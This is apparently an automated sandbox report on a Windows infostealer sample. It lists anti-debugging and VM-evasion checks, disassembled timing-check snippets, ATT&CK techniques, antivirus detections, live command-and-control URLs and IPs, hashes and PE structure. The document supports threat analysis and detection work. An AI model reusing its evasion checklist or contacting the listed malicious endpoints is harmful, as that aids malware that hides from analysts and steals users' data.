Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360B45 second address: 7360BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C67h 0x00000009 adc eax, 5815265Eh 0x0000000f jmp 00007FAAAD0E3C69h 0x00000014 popfd 0x00000015 mov cx, 0727h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FAAAD0E3C66h 0x00000026 and eax, 3390E988h 0x0000002c jmp 00007FAAAD0E3C5Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360BB5 second address: 7360BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAAACBBF1FEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FAAACBBF200h 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360BF6 second address: 7360BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360BFA second address: 7360C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360C00 second address: 7360C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 28h 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAAAD0E3C69h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAD0E3C5Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360C35 second address: 7360C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAACBBF1FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 7360C5B second address: 7360C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 66h 0x00000005 pushfd 0x00000006 jmp 00007FAAAD0E3C68h 0x0000000b add ch, FFFFFFC8h 0x0000000e jmp 00007FAAAD0E3C5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ecx, ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | RDTSC instruction interceptor: First address: 73609F3 second address: 73609F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Special instruction interceptor: First address: CD0976 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Special instruction interceptor: First address: E78B0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Special instruction interceptor: First address: E80631 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Special instruction interceptor: First address: F053D1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0058255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0058255D
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005829FF
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0058255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0058255D
Source: Bo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Bo6uO5gKL4.exe, 00000000.00000003.1599494153.0000000001853000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Bo6uO5gKL4.exe | Binary or memory string: Hyper-V RAW
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675761192.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669742313.00000000018B1000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1670267128.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669712974.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1670311640.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669640558.000000000187B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | File opened: NTICE
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | File opened: SICE
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Process queried: DebugPort
Source: Bo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ^^Program Manager
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.9:49706 -> 34.147.147.173:80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 741 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
Bo6uO5gKL4.exe | 47% | ReversingLabs | Win32.Infostealer.Tinba
Bo6uO5gKL4.exe | 44% | Virustotal |
Bo6uO5gKL4.exe | 100% | Avira | TR/Crypt.TPM.Gen
Bo6uO5gKL4.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZ | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsi | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fortth14vs.top | 34.147.147.173 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
httpbin.org | 34.200.57.114 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | true | Avira URL Cloud: malware | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | true | Avira URL Cloud: malware | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://httpbin.org/ipbefore | Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/http-cookies.html | Bo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/hsts.html# | Bo6uO5gKL4.exe | false | | high
http://home.fortth14vs.top/gduZ | Bo6uO5gKL4.exe, 00000000.00000003.1669640558.000000000187B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsi | Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000181E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963 | Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000184B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/alt-svc.html | Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
34.147.147.173 | home.fortth14vs.top | United States | 2686 | ATGS-MMD-ASUS | false
34.200.57.114 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582826
Start date and time: 2024-12-31 15:40:33 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Bo6uO5gKL4.exe
renamed because original name is a hash value
Original Sample Name: 935d1fe58326c50f930c94e3493b266c.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.200.57.114 | JbN2WYseAr.exe | malicious | Unknown |
| r8nllkNEQX.exe | malicious | Unknown |
| ivHDHq51Ar.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fortth14vs.top | r8nllkNEQX.exe | malicious | Unknown | 91.149.241.220
| yqUQPPp0LM.exe | malicious | Unknown | 91.149.241.220
| ZN34wF8WI2.exe | malicious | Unknown | 91.149.241.220
| Hqle5OSmLQ.exe | malicious | Unknown | 91.149.241.220
fp2e7a.wpc.phicdn.net | vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 192.229.221.95
| BEncode Editor.exe | malicious | Unknown | 192.229.221.95
| valyzt.msi | malicious | XRed | 192.229.221.95
| docx.msi | malicious | XRed | 192.229.221.95
| SecuredOnedrive.ClientSetup.exe | malicious | ScreenConnect Tool | 192.229.221.95
| dsoft.exe | malicious | Python Stealer, Creal Stealer | 192.229.221.95
| KL-3.1.16.exe | malicious | Nitol, Zegost | 192.229.221.95
| 2GL073z1wL.exe | malicious | Unknown | 192.229.221.95
| installer64v1.0.0.msi | malicious | Unknown | 192.229.221.95
| test5.exe | malicious | CobaltStrike, Metasploit | 192.229.221.95
httpbin.org | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114
| r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
| yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
| ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
| ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
| Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
| Set-up.exe | malicious | Unknown | 52.202.253.164
| Set-up.exe | malicious | Unknown | 34.197.122.172
| Set-up.exe | malicious | Unknown | 52.73.63.247
| a2mNMrPxow.exe | malicious | Unknown | 3.218.7.103
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114
| r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
| yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
| ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
| ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
| Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
| PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105
| http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69
| Set-up.exe | malicious | Unknown | 52.202.253.164
| kwari.mips.elf | malicious | Unknown | 54.226.65.111
ATGS-MMD-ASUS | http://usps.com-trackaddn.top/l | malicious | Unknown | 34.54.88.138
| cbr.x86.elf | malicious | Mirai | 57.13.227.38
| https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 34.36.178.232
| kwari.ppc.elf | malicious | Unknown | 48.233.101.215
| kwari.arm.elf | malicious | Unknown | 57.204.182.195
| kwari.mpsl.elf | malicious | Unknown | 57.206.149.213
| kwari.arm7.elf | malicious | Mirai | 34.31.161.194
| https://tepco-jp-lin;.%5Dshop/co/tepco | malicious | Unknown | 57.182.72.119
| botx.mips.elf | malicious | Mirai | 32.75.183.191
| botx.sh4.elf | malicious | Mirai | 48.108.128.188
                                No context
                                No context
                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.988218247487919
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Bo6uO5gKL4.exe
File size: 4'494'336 bytes
MD5: 935d1fe58326c50f930c94e3493b266c
SHA1: cd649b9eaae16dc9457c388970427710e485eb9c
SHA256: ad2f45143de4a73f40010ac03e0aff210dcf24dfc8b0fffba678c3e9f20d5e22
SHA512: 8477dfd72a20789e4aa0bc74c9513a7b1c0c7689338879653694c9de5a6360c55f3da88527f43c9c3c194a2e19dd703005f90fd51aa8c3b9992922f0c3647ed8
SSDEEP: 98304:TqLg5Jh20djlrckiJMxKsoWsZZngNgGgtMFpcd7f+Mo39jBXRRjp8C:Wczhpdjlrc1uKahNVsMncd7fnoNV/O
TLSH: DD2633DAD2B1B0FFC89563324F6698C585FEDD3CB44DD267B50385A2B8927F20906AD0
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...0........M...@..........................`........D...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x10a3000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:
                                    Instruction
                                    jmp 00007FAAACC42CDAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74c05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74b000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x778200 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca13c0 | 0x10 | nlrwmcpx
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xca1370 | 0x18 | nlrwmcpx
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x74a000 | 0x289000 | 2ab766a994316c93ee68540303046cea | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x74b000 | 0x2b0 | 0x200 | 5c0b3fa502004abd7bfd7c12d4ff2913 | False | 0.796875 | data | 6.052531537872281 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x74c000 | 0x1000 | 0x200 | 52564c2cea63394dbc4e71775ebabcc0 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x74d000 | 0x398000 | 0x200 | 38d1c15f1492d15fdd090b47289478fe | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nlrwmcpx | 0xae5000 | 0x1bd000 | 0x1bc800 | 4cd5cf0b57fa4791f7fd9954faf7fb7e | False | 0.994404263920135 | data | 7.955790238153636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gbteqlgw | 0xca2000 | 0x1000 | 0x400 | 15be36eea9de8864f6d564fc6fa3e193 | False | 0.8251953125 | data | 6.44680547012041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xca3000 | 0x3000 | 0x2200 | c698845e34a16a1c124bf2b2e494ef12 | False | 0.0700827205882353 | DOS executable (COM) | 0.7583761956079828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xca13d0 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 15:41:57.412885904 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:57.412944078 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:57.413014889 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:57.424616098 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
Dec 31, 2024 15:41:57.424628019 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.093822956 CET | 443 | 49705 | 34.200.57.114 | 192.168.2.9
Dec 31, 2024 15:41:58.094583035 CET | 49705 | 443 | 192.168.2.9 | 34.200.57.114
